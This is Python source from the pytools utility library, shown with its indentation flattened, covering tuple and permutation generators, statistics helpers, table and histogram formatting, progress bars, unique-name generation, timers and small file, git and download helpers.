for name, value in namespace.items():
if name != "__metaclass__":
setattr(base, name, value)
return base
# }}}
# {{{ generic utilities
def add_tuples(t1, t2):
return tuple([t1v + t2v for t1v, t2v in zip(t1, t2)])
def negate_tuple(t1):
return tuple([-t1v for t1v in t1])
def shift(vec, dist):
"""Return a copy of C{vec} shifted by C{dist}.
    @postcondition: C{shift(a, i)[j] == a[(j-i) % len(a)]}
"""
result = vec[:]
N = len(vec) # noqa
dist = dist % N
# modulo only returns positive distances!
if dist > 0:
result[dist:] = vec[:N-dist]
result[:dist] = vec[N-dist:]
return result
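# Example (illustrative): shift([1, 2, 3, 4], 1) == [4, 1, 2, 3], i.e. each entry moves
# one position to the right and the last entry wraps around to the front.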
def len_iterable(iterable):
return sum(1 for i in iterable)
def flatten(iterable):
"""For an iterable of sub-iterables, generate each member of each
sub-iterable in turn, i.e. a flattened version of that super-iterable.
Example: Turn [[a,b,c],[d,e,f]] into [a,b,c,d,e,f].
"""
for sublist in iterable:
yield from sublist
def general_sum(sequence):
return reduce(operator.add, sequence)
def linear_combination(coefficients, vectors):
result = coefficients[0] * vectors[0]
for c, v in zip(coefficients[1:], vectors[1:]):
result += c*v
return result
def common_prefix(iterable, empty=None):
it = iter(iterable)
try:
pfx = next(it)
except StopIteration:
return empty
for v in it:
for j, pfx_j in enumerate(pfx):
if pfx_j != v[j]:
pfx = pfx[:j]
if j == 0:
return pfx
break
return pfx
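# Example (illustrative): common_prefix(["flatten", "flatland", "flatmate"]) == "flat",
# while common_prefix([], empty="") returns the supplied *empty* value.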
def decorate(function, iterable):
return [(x, function(x)) for x in iterable]
def partition(criterion, iterable):
part_true = []
part_false = []
for i in iterable:
if criterion(i):
part_true.append(i)
else:
part_false.append(i)
return part_true, part_false
def partition2(iterable):
part_true = []
part_false = []
for pred, i in iterable:
if pred:
part_true.append(i)
else:
part_false.append(i)
return part_true, part_false
def product(iterable: Iterable[Any]) -> Any:
from operator import mul
return reduce(mul, iterable, 1)
def reverse_dictionary(the_dict):
result = {}
for key, value in the_dict.items():
if value in result:
raise RuntimeError(
"non-reversible mapping, duplicate key '%s'" % value)
result[value] = key
return result
def set_sum(set_iterable):
from operator import or_
return reduce(or_, set_iterable, set())
def div_ceil(nr, dr):
return -(-nr // dr)
def uniform_interval_splitting(n, granularity, max_intervals):
""" Return *(interval_size, num_intervals)* such that::
num_intervals * interval_size >= n
and::
(num_intervals - 1) * interval_size < n
and *interval_size* is a multiple of *granularity*.
"""
# ported from Thrust
grains = div_ceil(n, granularity)
# one grain per interval
if grains <= max_intervals:
return granularity, grains
grains_per_interval = div_ceil(grains, max_intervals)
interval_size = grains_per_interval * granularity
num_intervals = div_ceil(n, interval_size)
return interval_size, num_intervals
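# Example (illustrative): uniform_interval_splitting(77, granularity=10, max_intervals=4)
# returns (20, 4): 77 items need ceil(77/10) = 8 grains, more than 4 intervals allow, so
# each interval covers ceil(8/4) = 2 grains (size 20) and ceil(77/20) = 4 intervals suffice.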
def find_max_where(predicate, prec=1e-5, initial_guess=1, fail_bound=1e38):
"""Find the largest value for which a predicate is true,
along a half-line. 0 is assumed to be the lower bound."""
# {{{ establish bracket
mag = initial_guess
if predicate(mag):
mag *= 2
while predicate(mag):
mag *= 2
if mag > fail_bound:
raise RuntimeError("predicate appears to be true "
"everywhere, up to %g" % fail_bound)
lower_true = mag/2
upper_false = mag
else:
mag /= 2
while not predicate(mag):
mag /= 2
if mag < prec:
return mag
lower_true = mag
upper_false = mag*2
# }}}
# {{{ refine
# Refine a bracket between *lower_true*, where the predicate is true,
# and *upper_false*, where it is false, until *prec* is satisfied.
assert predicate(lower_true)
assert not predicate(upper_false)
while abs(lower_true-upper_false) > prec:
mid = (lower_true+upper_false)/2
if predicate(mid):
lower_true = mid
else:
upper_false = mid
return lower_true
# }}}
# }}}
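# Example for find_max_where above (illustrative): find_max_where(lambda x: x <= 100,
# prec=1e-3) brackets the boundary by repeated doubling and then bisects, returning a
# value within *prec* of 100.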
# {{{ argmin, argmax
def argmin2(iterable, return_value=False):
it = iter(iterable)
try:
current_argmin, current_min = next(it)
except StopIteration:
raise ValueError("argmin of empty iterable")
for arg, item in it:
if item < current_min:
current_argmin = arg
current_min = item
if return_value:
return current_argmin, current_min
else:
return current_argmin
def argmax2(iterable, return_value=False):
it = iter(iterable)
try:
current_argmax, current_max = next(it)
except StopIteration:
raise ValueError("argmax of empty iterable")
for arg, item in it:
if item > current_max:
current_argmax = arg
current_max = item
if return_value:
return current_argmax, current_max
else:
return current_argmax
def argmin(iterable):
return argmin2(enumerate(iterable))
def argmax(iterable):
return argmax2(enumerate(iterable))
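# Example (illustrative): argmin([4, 2, 7]) == 1 and argmax([4, 2, 7]) == 2; the *2
# variants take (argument, value) pairs, e.g. argmin2({"a": 3, "b": 1}.items()) == "b".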
# }}}
# {{{ cartesian products etc.
def cartesian_product(*args):
if len(args) == 1:
for arg in args[0]:
yield (arg,)
return
first = args[:-1]
for prod in cartesian_product(*first):
for i in args[-1]:
yield prod + (i,)
def distinct_pairs(list1, list2):
for i, xi in enumerate(list1):
for j, yj in enumerate(list2):
if i != j:
yield (xi, yj)
def cartesian_product_sum(list1, list2):
"""This routine returns a list of sums of each element of
list1 with each element of list2. Also works with lists.
"""
for i in list1:
for j in list2:
yield i+j
# }}}
# {{{ elementary statistics
def average(iterable):
"""Return the average of the values in iterable.
iterable may not be empty.
"""
it = iterable.__iter__()
try:
s = next(it)
count = 1
except StopIteration:
raise ValueError("empty average")
for value in it:
s = s + value
count += 1
return s/count
class VarianceAggregator:
"""Online variance calculator.
See http://en.wikipedia.org/wiki/Algorithms_for_calculating_variance
Adheres to pysqlite's aggregate interface.
"""
def __init__(self, entire_pop):
self.n = 0
self.mean = 0
self.m2 = 0
self.entire_pop = entire_pop
def step(self, x):
self.n += 1
delta_ = x - self.mean
self.mean += delta_/self.n
self.m2 += delta_*(x - self.mean)
def finalize(self):
if self.entire_pop:
if self.n == 0:
return None
else:
return self.m2/self.n
else:
if self.n <= 1:
return None
else:
return self.m2/(self.n - 1)
def variance(iterable, entire_pop):
v_comp = VarianceAggregator(entire_pop)
for x in iterable:
v_comp.step(x)
return v_comp.finalize()
def std_deviation(iterable, finite_pop):
from math import sqrt
return sqrt(variance(iterable, finite_pop))
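# Example (illustrative): variance([1.0, 2.0, 3.0], entire_pop=True) == 2/3 (population
# variance, divides by n), while entire_pop=False gives the sample variance 1.0
# (divides by n - 1).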
# }}}
# {{{ permutations, tuples, integer sequences
def wandering_element(length, wanderer=1, landscape=0):
for i in range(length):
yield i*(landscape,) + (wanderer,) + (length-1-i)*(landscape,)
def indices_in_shape(shape):
from warnings import warn
warn("indices_in_shape is deprecated. You should prefer numpy.ndindex.",
DeprecationWarning, stacklevel=2)
if isinstance(shape, int):
shape = (shape,)
if not shape:
yield ()
elif len(shape) == 1:
for i in range(0, shape[0]):
yield (i,)
else:
remainder = shape[1:]
for i in range(0, shape[0]):
for rest in indices_in_shape(remainder):
yield (i,)+rest
def generate_nonnegative_integer_tuples_below(n, length=None, least=0):
"""n may be a sequence, in which case length must be None."""
if length is None:
if not n:
yield ()
return
my_n = n[0]
n = n[1:]
next_length = None
else:
my_n = n
assert length >= 0
if length == 0:
yield ()
return
next_length = length-1
for i in range(least, my_n):
my_part = (i,)
for base in generate_nonnegative_integer_tuples_below(n, next_length, least):
yield my_part + base
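# Example (illustrative): list(generate_nonnegative_integer_tuples_below(2, 2)) ==
# [(0, 0), (0, 1), (1, 0), (1, 1)]; passing a sequence such as (2, 3) instead of an int
# bounds each position individually (and *length* must then be None).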
def generate_decreasing_nonnegative_tuples_summing_to(
n, length, min_value=0, max_value=None):
if length == 0:
yield ()
elif length == 1:
if n <= max_value:
#print "MX", n, max_value
yield (n,)
else:
return
else:
if max_value is None or n < max_value:
max_value = n
for i in range(min_value, max_value+1):
#print "SIG", sig, i
for remainder in generate_decreasing_nonnegative_tuples_summing_to(
n-i, length-1, min_value, i):
yield (i,) + remainder
def generate_nonnegative_integer_tuples_summing_to_at_most(n, length):
"""Enumerate all non-negative integer tuples summing to at most n,
exhausting the search space by varying the first entry fastest,
and the last entry the slowest.
"""
assert length >= 0
if length == 0:
yield ()
else:
for i in range(n+1):
for remainder in generate_nonnegative_integer_tuples_summing_to_at_most(
n-i, length-1):
yield remainder + (i,)
def generate_all_nonnegative_integer_tuples(length, least=0):
assert length >= 0
current_max = least
while True:
for max_pos in range(length):
for prebase in generate_nonnegative_integer_tuples_below(
current_max, max_pos, least):
for postbase in generate_nonnegative_integer_tuples_below(
current_max+1, length-max_pos-1, least):
                    yield prebase + (current_max,) + postbase
current_max += 1
# backwards compatibility
generate_positive_integer_tuples_below = generate_nonnegative_integer_tuples_below
generate_all_positive_integer_tuples = generate_all_nonnegative_integer_tuples
def _pos_and_neg_adaptor(tuple_iter):
for tup in tuple_iter:
nonzero_indices = [i for i in range(len(tup)) if tup[i] != 0]
for do_neg_tup in generate_nonnegative_integer_tuples_below(
2, len(nonzero_indices)):
this_result = list(tup)
for index, do_neg in enumerate(do_neg_tup):
if do_neg:
this_result[nonzero_indices[index]] *= -1
yield tuple(this_result)
def generate_all_integer_tuples_below(n, length, least_abs=0):
return _pos_and_neg_adaptor(generate_nonnegative_integer_tuples_below(
n, length, least_abs))
def generate_all_integer_tuples(length, least_abs=0):
return _pos_and_neg_adaptor(generate_all_nonnegative_integer_tuples(
length, least_abs))
def generate_permutations(original):
"""Generate all permutations of the list *original*.
Nicked from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/252178
"""
if len(original) <= 1:
yield original
else:
for perm_ in generate_permutations(original[1:]):
for i in range(len(perm_)+1):
#nb str[0:1] works in both string and list contexts
yield perm_[:i] + original[0:1] + perm_[i:]
def generate_unique_permutations(original):
"""Generate all unique permutations of the list *original*.
"""
    had_those = set()
    for perm_ in generate_permutations(original):
        # Use a hashable tuple as the "seen" key so that list inputs work, too.
        perm_key = tuple(perm_)
        if perm_key not in had_those:
            had_those.add(perm_key)
            yield perm_
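# Example (illustrative): list(generate_permutations((1, 2))) == [(1, 2), (2, 1)], and
# generate_unique_permutations((1, 1, 2)) yields each of the three distinct arrangements
# exactly once.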
def enumerate_basic_directions(dimensions):
coordinate_list = [[0], [1], [-1]]
    return list(reduce(cartesian_product_sum, [coordinate_list] * dimensions))[1:]
# }}}
# {{{ index mangling
def get_read_from_map_from_permutation(original, permuted):
"""With a permutation given by *original* and *permuted*,
generate a list *rfm* of indices such that
``permuted[i] == original[rfm[i]]``.
Requires that the permutation can be inferred from
*original* and *permuted*.
.. doctest ::
>>> for p1 in generate_permutations(list(range(5))):
... for p2 in generate_permutations(list(range(5))):
... rfm = get_read_from_map_from_permutation(p1, p2)
... p2a = [p1[rfm[i]] for i in range(len(p1))]
... assert p2 == p2a
"""
from warnings import warn
warn("get_read_from_map_from_permutation is deprecated and will be "
"removed in 2019", DeprecationWarning, stacklevel=2)
assert len(original) == len(permuted)
where_in_original = {
original[i]: i for i in range(len(original))}
assert len(where_in_original) == len(original)
return tuple(where_in_original[pi] for pi in permuted)
def get_write_to_map_from_permutation(original, permuted):
"""With a permutation given by *original* and *permuted*,
generate a list *wtm* of indices such that
``permuted[wtm[i]] == original[i]``.
Requires that the permutation can be inferred from
*original* and *permuted*.
.. doctest ::
>>> for p1 in generate_permutations(list(range(5))):
... for p2 in generate_permutations(list(range(5))):
... wtm = get_write_to_map_from_permutation(p1, p2)
... p2a = [0] * len(p2)
... for i, oi in enumerate(p1):
... p2a[wtm[i]] = oi
... assert p2 == p2a
"""
from warnings import warn
warn("get_write_to_map_from_permutation is deprecated and will be "
"removed in 2019", DeprecationWarning, stacklevel=2)
assert len(original) == len(permuted)
where_in_permuted = {
permuted[i]: i for i in range(len(permuted))}
assert len(where_in_permuted) == len(permuted)
return tuple(where_in_permuted[oi] for oi in original)
# }}}
# {{{ graph algorithms
from pytools.graph import a_star as a_star_moved
a_star = MovedFunctionDeprecationWrapper(a_star_moved)
# }}}
# {{{ formatting
# {{{ table formatting
class Table:
"""An ASCII table generator.
:arg alignments: List of alignments of each column ('l', 'c', or 'r',
for left, center, and right alignment, respectively). Columns which
have no alignment specifier will use the last specified alignment. For
example, with `alignments=['l', 'r']`, the third and all following
columns will use 'r' alignment.
.. automethod:: add_row
.. automethod:: __str__
.. automethod:: latex
.. automethod:: github_markdown
"""
def __init__(self, alignments=None):
self.rows = []
if alignments is not None:
self.alignments = alignments
else:
self.alignments = ["l"]
def add_row(self, row):
self.rows.append([str(i) for i in row])
def __str__(self):
"""
Returns a string representation of the table.
.. doctest ::
>>> tbl = Table(alignments=['l', 'r', 'l'])
>>> tbl.add_row([1, '|'])
>>> tbl.add_row([10, '20||'])
>>> print(tbl)
            1  |    |
            ---+------
            10 | 20||
"""
columns = len(self.rows[0])
col_widths = [max(len(row[i]) for row in self.rows)
for i in range(columns)]
alignments = self.alignments
# If not all alignments were specified, extend alignments with the
# last alignment specified:
alignments += self.alignments[-1] * (columns - len(self.alignments))
lines = [" | ".join([
cell.center(col_width) if align == "c"
else cell.ljust(col_width) if align == "l"
else cell.rjust(col_width)
for cell, col_width, align in zip(row, col_widths, alignments)])
for row in self.rows]
lines[1:1] = ["+".join("-" * (col_width + 1 + (i > 0))
for i, col_width in enumerate(col_widths))]
return "\n".join(lines)
def github_markdown(self):
r"""Returns a string representation of the table formatted as
`GitHub-Flavored Markdown.
<https://docs.github.com/en/github/writing-on-github/organizing-information-with-tables>`__
.. doctest ::
>>> tbl = Table(alignments=['l', 'r', 'l'])
>>> tbl.add_row([1, '|'])
>>> tbl.add_row([10, '20||'])
>>> print(tbl.github_markdown())
            1  |     \|
            :--|-------:
            10 | 20\|\|
""" # noqa: W605
# Pipe symbols ('|') must be replaced
rows = [[w.replace("|", "\\|") for w in r] for r in self.rows]
columns = len(rows[0])
col_widths = [max(len(row[i]) for row in rows)
for i in range(columns)]
alignments = self.alignments
# If not all alignments were specified, extend alignments with the
# last alignment specified:
alignments += self.alignments[-1] * (columns - len(self.alignments))
lines = [" | ".join([
cell.center(col_width) if align == "c"
else cell.ljust(col_width) if align == "l"
else cell.rjust(col_width)
for cell, col_width, align in zip(row, col_widths, alignments)])
for row in rows]
lines[1:1] = ["|".join(
":" + "-" * (col_width - 1 + (i > 0)) + ":" if align == "c"
else ":" + "-" * (col_width + (i > 0)) if align == "l"
else "-" * (col_width + (i > 0)) + ":"
for i, (col_width, align) in enumerate(zip(col_widths, alignments)))]
return "\n".join(lines)
def csv(self, dialect="excel", csv_kwargs=None):
"""Returns a string containing a CSV representation of the table.
:arg dialect: String passed to :func:`csv.writer`.
:arg csv_kwargs: Dict of arguments passed to :func:`csv.writer`.
.. doctest ::
>>> tbl = Table()
>>> tbl.add_row([1, ","])
>>> tbl.add_row([10, 20])
>>> print(tbl.csv())
1,","
10,20
"""
import csv
import io
if csv_kwargs is None:
csv_kwargs = {}
# Default is "\r\n"
if "lineterminator" not in csv_kwargs:
csv_kwargs["lineterminator"] = "\n"
output = io.StringIO()
writer = csv.writer(output, dialect, **csv_kwargs)
writer.writerows(self.rows)
return output.getvalue().rstrip(csv_kwargs["lineterminator"])
def latex(self, skip_lines=0, hline_after=None):
if hline_after is None:
hline_after = []
lines = []
for row_nr, row in list(enumerate(self.rows))[skip_lines:]:
lines.append(" & ".join(row)+r" \\")
if row_nr in hline_after:
lines.append(r"\hline")
return "\n".join(lines)
# }}}
# {{{ histogram formatting
def string_histogram( # pylint: disable=too-many-arguments,too-many-locals
iterable, min_value=None, max_value=None,
bin_count=20, width=70, bin_starts=None, use_unicode=True):
if bin_starts is None:
if min_value is None or max_value is None:
iterable = list(iterable)
min_value = min(iterable)
max_value = max(iterable)
bin_width = (max_value - min_value)/bin_count
bin_starts = [min_value+bin_width*i for i in range(bin_count)]
bins = [0 for i in range(len(bin_starts))]
from bisect import bisect
for value in iterable:
if max_value is not None and value > max_value or value < bin_starts[0]:
from warnings import warn
warn("string_histogram: out-of-bounds value ignored")
else:
bin_nr = bisect(bin_starts, value)-1
try:
bins[bin_nr] += 1
except Exception:
print(value, bin_nr, bin_starts)
raise
from math import floor, ceil
if use_unicode:
def format_bar(cnt):
scaled = cnt*width/max_count
full = int(floor(scaled))
eighths = int(ceil((scaled-full)*8))
if eighths:
return full*chr(0x2588) + chr(0x2588+(8-eighths))
else:
return full*chr(0x2588)
else:
def format_bar(cnt):
return int(ceil(cnt*width/max_count))*"#"
max_count = max(bins)
total_count = sum(bins)
return "\n".join("%9g |%9d | %3.0f %% | %s" % (
bin_start,
bin_value,
bin_value/total_count*100,
format_bar(bin_value))
for bin_start, bin_value in zip(bin_starts, bins))
# }}}
def word_wrap(text, width, wrap_using="\n"):
# http://code.activestate.com/recipes/148061-one-liner-word-wrap-function/
r"""
A word-wrap function that preserves existing line breaks
and most spaces in the text. Expects that existing line
breaks are posix newlines (``\n``).
"""
space_or_break = [" ", wrap_using]
return reduce(lambda line, word: "%s%s%s" %
(line,
space_or_break[(len(line)-line.rfind("\n")-1
+ len(word.split("\n", 1)[0])
>= width)],
word),
text.split(" ")
)
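# Example (illustrative): word_wrap("the quick brown fox", 10) == "the quick\nbrown fox";
# words are kept intact and a break is inserted once the current line would reach *width*.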
# }}}
# {{{ command line interfaces -------------------------------------------------
def _exec_arg(arg, execenv):
import os
if os.access(arg, os.F_OK):
        exec(compile(open(arg).read(), arg, "exec"), execenv)
else:
exec(compile(arg, "<command line>", "exec"), execenv)
class CPyUserInterface:
class Parameters(Record):
pass
def __init__(self, variables, constants=None, doc=None):
if constants is None:
constants = {}
if doc is None:
doc = {}
self.variables = variables
self.constants = constants
self.doc = doc
def show_usage(self, progname):
print("usage: %s <FILE-OR-STATEMENTS>" % progname)
print()
print("FILE-OR-STATEMENTS may either be Python statements of the form")
print("'variable1 = value1; variable2 = value2' or the name of a file")
print("containing such statements. Any valid Python code may be used")
print("on the command line or in a command file. If new variables are")
print("used, they must start with 'user_' or just '_'.")
print()
print("The following variables are recognized:")
for v in sorted(self.variables):
print(" {} = {}".format(v, self.variables[v]))
if v in self.doc:
print(" %s" % self.doc[v])
print()
print("The following constants are supplied:")
for c in sorted(self.constants):
print(" {} = {}".format(c, self.constants[c]))
if c in self.doc:
print(" %s" % self.doc[c])
def gather(self, argv=None):
if argv is None:
argv = sys.argv
if len(argv) == 1 or (
("-h" in argv)
or ("help" in argv)
or ("-help" in argv)
or ("--help" in argv)):
self.show_usage(argv[0])
sys.exit(2)
execenv = self.variables.copy()
execenv.update(self.constants)
for arg in argv[1:]:
_exec_arg(arg, execenv)
# check if the user set invalid keys
for added_key in (
set(execenv.keys())
- set(self.variables.keys())
- set(self.constants.keys())):
if not (added_key.startswith("user_") or added_key.startswith("_")):
raise ValueError(
"invalid setup key: '%s' "
"(user variables must start with 'user_' or '_')"
% added_key)
result = self.Parameters({key: execenv[key] for key in self.variables})
self.validate(result)
return result
def validate(self, setup):
pass
# }}}
# {{{ debugging
class StderrToStdout:
def __enter__(self):
# pylint: disable=attribute-defined-outside-init
self.stderr_backup = sys.stderr
sys.stderr = sys.stdout
def __exit__(self, exc_type, exc_val, exc_tb):
sys.stderr = self.stderr_backup
del self.stderr_backup
def typedump(val, max_seq=5, special_handlers=None):
if special_handlers is None:
special_handlers = {}
try:
hdlr = special_handlers[type(val)]
except KeyError:
pass
else:
return hdlr(val)
try:
len(val)
except TypeError:
return type(val).__name__
else:
if isinstance(val, dict):
return "{%s}" % (
", ".join(
"{!r}: {}".format(str(k), typedump(v))
for k, v in val.items()))
try:
if len(val) > max_seq:
return "{}({},...)".format(
type(val).__name__,
",".join(typedump(x, max_seq, special_handlers)
for x in val[:max_seq]))
else:
return "{}({})".format(
type(val).__name__,
",".join(typedump(x, max_seq, special_handlers)
for x in val))
except TypeError:
return val.__class__.__name__
def invoke_editor(s, filename="edit.txt", descr="the file"):
from tempfile import mkdtemp
tempdir = mkdtemp()
from os.path import join
full_name = join(tempdir, filename)
outf = open(full_name, "w")
outf.write(str(s))
outf.close()
import os
if "EDITOR" in os.environ:
from subprocess import Popen
p = Popen([os.environ["EDITOR"], full_name])
os.waitpid(p.pid, 0)
else:
print("(Set the EDITOR environment variable to be "
"dropped directly into an editor next time.)")
input("Edit %s at %s now, then hit [Enter]:"
% (descr, full_name))
inf = open(full_name)
result = inf.read()
inf.close()
return result
# }}}
# {{{ progress bars
class ProgressBar: # pylint: disable=too-many-instance-attributes
"""
.. automethod:: draw
.. automethod:: progress
.. automethod:: set_progress
.. automethod:: finished
.. automethod:: __enter__
.. automethod:: __exit__
"""
def __init__(self, descr, total, initial=0, length=40):
import time
self.description = descr
self.total = total
self.done = initial
self.length = length
self.last_squares = -1
self.start_time = time.time()
self.last_update_time = self.start_time
self.speed_meas_start_time = self.start_time
self.speed_meas_start_done = initial
self.time_per_step = None
def draw(self):
import time
now = time.time()
squares = int(self.done/self.total*self.length)
if squares != self.last_squares or now-self.last_update_time > 0.5:
if (self.done != self.speed_meas_start_done
and now-self.speed_meas_start_time > 3):
new_time_per_step = (now-self.speed_meas_start_time) \
/ (self.done-self.speed_meas_start_done)
if self.time_per_step is not None:
self.time_per_step = (new_time_per_step + self.time_per_step)/2
else:
self.time_per_step = new_time_per_step
self.speed_meas_start_time = now
self.speed_meas_start_done = self.done
if self.time_per_step is not None:
eta_str = "%7.1fs " % max(
0, (self.total-self.done) * self.time_per_step)
else:
eta_str = "?"
sys.stderr.write("{:<20} [{}] ETA {}\r".format(
self.description,
squares*"#"+(self.length-squares)*" ",
eta_str))
self.last_squares = squares
self.last_update_time = now
def progress(self, steps=1):
self.set_progress(self.done + steps)
def set_progress(self, done):
self.done = done
self.draw()
def finished(self):
self.set_progress(self.total)
sys.stderr.write("\n")
def __enter__(self):
self.draw()
def __exit__(self, exc_type, exc_val, exc_tb):
self.finished()
# }}}
# {{{ file system related
def assert_not_a_file(name):
import os
if os.access(name, os.F_OK):
raise OSError("file `%s' already exists" % name)
def add_python_path_relative_to_script(rel_path):
from os.path import dirname, join, abspath
script_name = sys.argv[0]
rel_script_dir = dirname(script_name)
sys.path.append(abspath(join(rel_script_dir, rel_path)))
# }}}
# {{{ numpy dtype mangling
def common_dtype(dtypes, default=None):
dtypes = list(dtypes)
if dtypes:
return argmax2((dtype, dtype.num) for dtype in dtypes)
else:
if default is not None:
return default
else:
raise ValueError(
"cannot find common dtype of empty dtype list")
def to_uncomplex_dtype(dtype):
import numpy
if dtype == numpy.complex64:
return numpy.float32
elif dtype == numpy.complex128:
return numpy.float64
if dtype == numpy.float32:
return numpy.float32
elif dtype == numpy.float64:
return numpy.float64
else:
raise TypeError("unrecgonized dtype '%s'" % dtype)
def match_precision(dtype, dtype_to_match):
import numpy
tgt_is_double = dtype_to_match in [
numpy.float64, numpy.complex128]
dtype_is_complex = dtype.kind == "c"
if dtype_is_complex:
if tgt_is_double:
return numpy.dtype(numpy.complex128)
else:
return numpy.dtype(numpy.complex64)
else:
if tgt_is_double:
return numpy.dtype(numpy.float64)
else:
return numpy.dtype(numpy.float32)
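# Example (illustrative): match_precision(numpy.dtype(numpy.complex64), numpy.float64)
# == numpy.dtype(numpy.complex128): the complex kind of *dtype* is kept while its
# precision is promoted (or demoted) to that of *dtype_to_match*.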
# }}}
# {{{ unique name generation
def generate_unique_names(prefix):
yield prefix
try_num = 0
while True:
yield "%s_%d" % (prefix, try_num)
try_num += 1
def generate_numbered_unique_names(
prefix: str, num: Optional[int] = None) -> Iterable[Tuple[int, str]]:
if num is None:
yield (0, prefix)
num = 0
while True:
name = "%s_%d" % (prefix, num)
num += 1
yield (num, name)
generate_unique_possibilities = MovedFunctionDeprecationWrapper(
generate_unique_names)
class UniqueNameGenerator:
"""
.. automethod:: is_name_conflicting
.. automethod:: add_name
.. automethod:: add_names
.. automethod:: __call__
"""
def __init__(self,
existing_names: Optional[Set[str]] = None,
forced_prefix: str = ""):
if existing_names is None:
existing_names = set()
self.existing_names = existing_names.copy()
self.forced_prefix = forced_prefix
self.prefix_to_counter: Dict[str, int] = {}
def is_name_conflicting(self, name: str) -> bool:
return name in self.existing_names
def _name_added(self, name: str) -> None:
"""Callback to alert subclasses when a name has been added.
.. note::
This will not get called for the names in the *existing_names*
argument to :meth:`__init__`.
"""
pass
def add_name(self, name: str) -> None:
if self.is_name_conflicting(name):
raise ValueError("name '%s' conflicts with existing names")
if not name.startswith(self.forced_prefix):
raise ValueError("name '%s' does not start with required prefix")
self.existing_names.add(name)
self._name_added(name)
def add_names(self, names: Iterable[str]) -> None:
for name in names:
self.add_name(name)
def __call__(self, based_on: str = "id") -> str:
based_on = self.forced_prefix + based_on
counter = self.prefix_to_counter.get(based_on, None)
for counter, var_name in generate_numbered_unique_names(based_on, counter):
if not self.is_name_conflicting(var_name):
break
self.prefix_to_counter[based_on] = counter
var_name = intern(var_name) # pylint: disable=undefined-loop-variable
self.existing_names.add(var_name)
self._name_added(var_name)
return var_name
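# Example usage (illustrative sketch):
#
#     vng = UniqueNameGenerator(forced_prefix="tmp_")
#     vng("x")    # -> "tmp_x"
#     vng("x")    # -> "tmp_x_0"
#     vng("x")    # -> "tmp_x_1"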
# }}}
# {{{ recursion limit
class MinRecursionLimit:
def __init__(self, min_rec_limit):
self.min_rec_limit = min_rec_limit
def __enter__(self):
# pylint: disable=attribute-defined-outside-init
self.prev_recursion_limit = sys.getrecursionlimit()
new_limit = max(self.prev_recursion_limit, self.min_rec_limit)
sys.setrecursionlimit(new_limit)
def __exit__(self, exc_type, exc_val, exc_tb):
# Deep recursion can produce deeply nested data structures
        # (or long chains of to-be gc'd generators) that cannot
        # undergo garbage collection with a lower recursion limit.
#
# As a result, it doesn't seem possible to lower the recursion limit
# again after it has been raised without causing reliability issues.
#
# See https://gitlab.tiker.net/inducer/sumpy/issues/31 for
# context.
pass
# }}}
# {{{ download from web if not present
def download_from_web_if_not_present(url, local_name=None):
"""
.. versionadded:: 2017.5
"""
from os.path import basename, exists
if local_name is None:
local_name = basename(url)
if not exists(local_name):
from pytools.version import VERSION_TEXT
from urllib.request import Request, urlopen
req = Request(url, headers={
"User-Agent": f"pytools/{VERSION_TEXT}"
})
with urlopen(req) as inf:
contents = inf.read()
with open(local_name, "wb") as outf:
outf.write(contents)
# }}}
# {{{ find git revisions
def find_git_revision(tree_root): # pylint: disable=too-many-locals
# Keep this routine self-contained so that it can be copy-pasted into
# setup.py.
from os.path import join, exists, abspath
tree_root = abspath(tree_root)
if not exists(join(tree_root, ".git")):
return None
# construct minimal environment
# stolen from
# https://github.com/numpy/numpy/blob/055ce3e90b50b5f9ef8cf1b8641c42e391f10735/setup.py#L70-L92
import os
env = {}
for k in ["SYSTEMROOT", "PATH", "HOME"]:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env["LANGUAGE"] = "C"
env["LANG"] = "C"
env["LC_ALL"] = "C"
from subprocess import Popen, PIPE, STDOUT
p = Popen(["git", "rev-parse", "HEAD"], shell=False,
stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True,
cwd=tree_root, env=env)
(git_rev, _) = p.communicate()
git_rev = git_rev.decode()
git_rev = git_rev.rstrip()
retcode = p.returncode
assert retcode is not None
if retcode != 0:
from warnings import warn
warn("unable to find git revision")
return None
return git_rev
def find_module_git_revision(module_file, n_levels_up):
from os.path import dirname, join
    tree_root = join(*([dirname(module_file)] + [".."] * n_levels_up))
return find_git_revision(tree_root)
# }}}
# {{{ create a reshaped view of a numpy array
def reshaped_view(a, newshape):
""" Create a new view object with shape ``newshape`` without copying the data of
``a``. This function is different from ``numpy.reshape`` by raising an
exception when data copy is necessary.
:arg a: a :class:`numpy.ndarray` object.
:arg newshape: an ``int`` object or a tuple of ``int`` objects.
.. versionadded:: 2018.4
"""
newview = a.view()
newview.shape = newshape
return newview
# }}}
# {{{ process timer
SUPPORTS_PROCESS_TIME = (sys.version_info >= (3, 3))
class ProcessTimer:
"""Measures elapsed wall time and process time.
.. automethod:: __enter__
.. automethod:: __exit__
.. automethod:: done
Timing data attributes:
.. attribute:: wall_elapsed
.. attribute:: process_elapsed
Only available in Python 3.3+.
.. versionadded:: 2018.5
"""
def __init__(self):
import time
if SUPPORTS_PROCESS_TIME:
self.perf_counter_start = time.perf_counter()
self.process_time_start = time.process_time()
else:
import timeit
self.time_start = timeit.default_timer()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
def done(self):
# pylint: disable=attribute-defined-outside-init
import time
if SUPPORTS_PROCESS_TIME:
self.wall_elapsed = time.perf_counter() - self.perf_counter_start
self.process_elapsed = time.process_time() - self.process_time_start
else:
import timeit
self.wall_elapsed = timeit.default_timer() - self.time_start
self.process_elapsed = None
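# Example usage (illustrative sketch; do_expensive_work is a placeholder):
#
#     with ProcessTimer() as pt:
#         do_expensive_work()
#     print(pt.wall_elapsed, pt.process_elapsed)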
# }}}
# {{{ log utilities
class ProcessLogger: # pylint: disable=too-many-instance-attributes
"""Logs the completion time of a (presumably) lengthy process to :mod:`logging`.
Only uses a high log level if the process took perceptible time.
.. automethod:: __init__
.. automethod:: done
.. automethod:: __enter__
.. automethod:: __exit__
"""
default_noisy_level = logging.INFO
def __init__( # pylint: disable=too-many-arguments
self, logger, description,
silent_level=None, noisy_level=None, long_threshold_seconds=None):
self.logger = logger
self.description = description
self.silent_level = silent_level or logging.DEBUG
self.noisy_level = noisy_level or self.default_noisy_level
self.long_threshold_seconds = (
# 0 is a valid value that should override the default
0.3 if long_threshold_seconds is None else long_threshold_seconds)
self.logger.log(self.silent_level, "%s: start", self.description)
self.is_done = False
import threading
self.late_start_log_thread = threading.Thread(target=self._log_start_if_long)
# Do not delay interpreter exit if thread not finished.
self.late_start_log_thread.daemon = True
# https://github.com/firedrakeproject/firedrake/issues/1422
